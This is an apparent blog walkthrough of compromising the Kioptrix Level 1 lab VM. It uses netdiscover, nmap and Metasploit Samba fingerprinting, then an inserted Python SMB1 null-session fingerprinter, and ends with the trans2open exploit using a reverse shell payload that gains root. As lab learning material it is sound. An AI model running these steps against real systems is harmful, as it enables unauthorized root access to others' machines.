I started the Kioptrix virtual machine in VirtualBox and also started my Kali virtual machine, which I used to attack the Kioptrix VM.

On my Kali machine I did not know the IP address of the Kioptrix VM, so I opened a terminal and entered the following command
netdiscover -r 10.0.2.0/24
netdiscover finds the live hosts on the local network by sending ARP requests (it needs root). The -r option gives the range of IP addresses I want it to scan; 10.0.2.0/24 is the virtual network I have set up in my cyber lab.

The netdiscover scan turned up 3 IP addresses.
I ran an Nmap scan against the last one, 10.0.2.9, because I knew the top two were not the target. I used the following Nmap command
nmap -sC -sV 10.0.2.9
-sC runs Nmap's default NSE scripts and -sV does service version detection.


When the scan finished it showed several open ports: 22, 80, 111, 139, 443 and 32768. Port 139 was running "netbios-ssn Samba smbd", so I investigated it further, since old Samba builds are frequently exploitable. The Nmap scan did not report the Samba version, so I opened Metasploit to try to find it.


Once Metasploit was open I wanted to see whether there was a module for determining the SMB version, so I typed
search smb_version
The results showed only one module (auxiliary/scanner/smb/smb_version). To use a module in Metasploit, type use followed by its number from the search results; in this case the command was
use 0

I typed show options to see the options for this module, set RHOSTS to the target machine with set RHOSTS 10.0.2.9, and then ran it with run.
show options
set RHOSTS 10.0.2.9
run
After the module runs it reports that the Samba version is Samba 2.2.1a. This is an auxiliary scanner rather than an exploit: it logs on with a null session and reads the version string Samba sends back in its session setup reply. Knowing the version, I went to Google to see whether there is an exploit for that particular version of Samba.
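The same fingerprint can be taken without Metasploit. The script below is an added example written for this walkthrough; it is not code from the post, from the Kioptrix VM or from the Metasploit project. It does what the smb_version module does in spirit: open a NetBIOS session on 139/tcp (the only SMB port Kioptrix exposes), negotiate SMB1, request a null session and parse the NativeOS and NativeLanMan strings out of the SESSION_SETUP_ANDX reply, which is where Samba reports its release. It also checks whether the reported release falls in the range the trans2open module covers, which the post turns to next. The client name "FINGERPRINT", the "Unix"/"Python" client strings and the sample reply used when no host is given are my own constructed values, not captured traffic; the live path has only been reasoned through against the MS-CIFS and RFC 1002 layouts, not run against Kioptrix.

```python
"""SMB1 null-session fingerprint of a Samba server (added example; not from the post or
from Metasploit). NetBIOS session request, NEGOTIATE, anonymous SESSION_SETUP_ANDX, then
read the NativeOS / NativeLanMan / PrimaryDomain strings from the reply. Field layouts
follow MS-CIFS and RFC 1002; the client strings and the offline fixture are constructed."""
import re, socket, struct

SMB_COM_NEGOTIATE, SMB_COM_SESSION_SETUP_ANDX = 0x72, 0x73
FLAGS2_UNICODE = 0x8000            # Flags2 bit: strings in this message are UTF-16LE
FLAGS2 = FLAGS2_UNICODE | 0x0001   # plus long names; no extended security (Samba 2.2 has none)
CAP_UNICODE, HDR = 0x00000004, 32  # client capability bit; SMB1 header length

def nb_wrap(payload, msg_type=0x00):
    """NetBIOS session service header: 1-byte type + 24-bit big-endian length."""
    return bytes([msg_type]) + len(payload).to_bytes(3, "big") + payload

def nb_name(name, suffix):
    """First-level encoded NetBIOS name: 15 chars + suffix byte, each nibble + 'A'."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return b"\x20" + bytes(0x41 + n for c in raw for n in (c >> 4, c & 0x0F)) + b"\x00"

def smb_header(command, status=0, uid=0, flags2=FLAGS2):
    """Magic, command, NT status, flags, flags2, 12 zero bytes (pid-high, security
    features, reserved), then TID, PID, UID, MID."""
    return (b"\xffSMB" + bytes([command]) + struct.pack("<I", status) + b"\x18"
            + struct.pack("<H", flags2) + b"\x00" * 12 + struct.pack("<HHHH", 0, 1234, uid, 1))

def build_negotiate():
    """NEGOTIATE: WordCount 0, ByteCount, then dialect names each prefixed with 0x02."""
    dialects = b"".join(b"\x02" + d + b"\x00" for d in (b"LANMAN1.0", b"NT LM 0.12"))
    return nb_wrap(smb_header(SMB_COM_NEGOTIATE) + b"\x00" + struct.pack("<H", len(dialects)) + dialects)

def build_session_setup():
    """Null-session SESSION_SETUP_ANDX: empty account and domain, one NUL as the OEM password."""
    params = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0,  # AndXCommand none, reserved, AndXOffset
                         0xFFFF, 2, 0, 0,             # MaxBufferSize, MaxMpxCount, VcNumber, SessionKey
                         1, 0, 0, CAP_UNICODE)        # OEM pw len, Unicode pw len, reserved, capabilities
    # 32 + 1 + 26 + 2 + the OEM password byte = 62, so the UTF-16 strings start on an even offset.
    data = b"\x00" + b"\x00\x00" * 2 + "Unix\x00Python\x00".encode("utf-16-le")
    return nb_wrap(smb_header(SMB_COM_SESSION_SETUP_ANDX) + bytes([13]) + params
                   + struct.pack("<H", len(data)) + data)

def parse_session_setup_reply(packet):
    """Return the NT status plus the server's NativeOS / NativeLanMan / PrimaryDomain strings."""
    smb = packet[4:] if packet[:1] == b"\x00" else packet          # strip NetBIOS header
    if smb[:4] != b"\xffSMB" or smb[4] != SMB_COM_SESSION_SETUP_ANDX:
        raise ValueError("not a SESSION_SETUP_ANDX reply")
    info = {"status": struct.unpack_from("<I", smb, 5)[0],
            "native_os": "", "native_lanman": "", "primary_domain": ""}
    unicode = bool(struct.unpack_from("<H", smb, 10)[0] & FLAGS2_UNICODE)
    word_count = smb[HDR]
    data_off = HDR + 1 + 2 * word_count + 2                         # past WordCount, words, ByteCount
    data = smb[data_off:data_off + struct.unpack_from("<H", smb, data_off - 2)[0]]
    if word_count == 0 or not data:
        return info            # error reply (e.g. STATUS_LOGON_FAILURE) carries no strings
    if unicode and data_off % 2:
        data = data[1:]        # one pad byte aligns the UTF-16 strings to an even offset
    parts = data.decode("utf-16-le" if unicode else "latin-1", errors="replace").split("\x00")
    info.update(zip(("native_os", "native_lanman", "primary_domain"), parts))
    return info

def build_session_setup_reply(native_os, native_lanman, domain, status=0):
    """Constructed UTF-16 server reply, used here only as an offline fixture (not a capture)."""
    data = "".join(s + "\x00" for s in (native_os, native_lanman, domain)).encode("utf-16-le")
    data = b"\x00" + data      # 32 + 1 + 6 + 2 = 41 is odd, so the server pads one byte
    params = struct.pack("<BBHH", 0xFF, 0, 0, 1)   # AndX none, reserved, offset, Action = guest
    return nb_wrap(smb_header(SMB_COM_SESSION_SETUP_ANDX, status, 100) + bytes([3]) + params
                   + struct.pack("<H", len(data)) + data)

def trans2open_candidate(native_lanman):
    """Samba 2.2.0 through 2.2.8 is the range the Metasploit trans2open module targets (2.2.8a is fixed)."""
    m = re.match(r"Samba (\d+)\.(\d+)\.(\d+)([a-z]?)", native_lanman)
    if not m or (int(m[1]), int(m[2])) != (2, 2):
        return False
    return int(m[3]) < 8 or (int(m[3]) == 8 and not m[4])

def recv_netbios(sock):
    """Read until one complete NetBIOS session message (4-byte header + body) is buffered."""
    buf = b""
    while len(buf) < 4 or len(buf) < 4 + int.from_bytes(buf[1:4], "big"):
        chunk = sock.recv(65536)
        if not chunk:
            raise ConnectionError("connection closed")
        buf += chunk
    return buf

def fingerprint(host, port=139, timeout=5.0):
    """Live use against a lab target: session request (139 only), NEGOTIATE, null SESSION_SETUP."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if port == 139:
            s.sendall(nb_wrap(nb_name("*SMBSERVER", 0x20) + nb_name("FINGERPRINT", 0x00), 0x81))
            if recv_netbios(s)[0] != 0x82:          # 0x82 = positive session response
                raise ConnectionError("NetBIOS session refused")
        s.sendall(build_negotiate())
        recv_netbios(s)
        s.sendall(build_session_setup())
        return parse_session_setup_reply(recv_netbios(s))

if __name__ == "__main__":
    import sys
    info = fingerprint(sys.argv[1]) if len(sys.argv) > 1 else parse_session_setup_reply(
        build_session_setup_reply("Unix", "Samba 2.2.1a", "MYGROUP"))
    print(info, "trans2open candidate:", trans2open_candidate(info["native_lanman"]))
```

Run it with the target address as the first argument (python3 fingerprint.py 10.0.2.9) to query the VM; with no argument it parses the constructed fixture instead. The null session is the point of the technique: Samba fills in NativeOS and NativeLanMan only on a successful session setup, so a server that rejects anonymous logons returns WordCount 0 and an NT status and the parser reports empty strings rather than guessing.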

Rapid7's site shows that the trans2open overflow exploit works against the Samba version the Kioptrix VM is running. I went back to Metasploit to see whether there is a module for trans2open and typed
search trans2open

The search returned 5 modules. I used module 1, the Linux one (exploit/linux/samba/trans2open), because we are dealing with a Linux host. The index numbers depend on your Metasploit version, so check the module path in the results rather than relying on the number. To interact with the module I used
use 1

When you enter the module it shows that no payload is configured, so we need to set one. I wanted a reverse shell, so I used a generic reverse shell and set it with the following command (and yes, I typed it wrong at first and then corrected it)
set payload generic/shell_reverse_tcp

Once the payload was set I set RHOSTS to the target IP address with
set RHOSTS 10.0.2.9
Metasploit fills in LHOST, the address the reverse shell connects back to, from your primary interface; if Kali has more than one interface, confirm with show options that it is your address on the lab network. With the payload and RHOSTS set, all that was left was to launch the exploit with
run
After running the exploit a reverse shell was opened (the module overflows a stack buffer in smbd, so if no shell appears on the first attempt, run it again). The first command I run after getting any shell is
whoami
whoami returns root, which shows we have successfully rooted the Kioptrix machine!
If you made it this far, thank you for reading my walkthrough of Kioptrix Level 1! Stay tuned for more content as I document more of my journey in cybersecurity.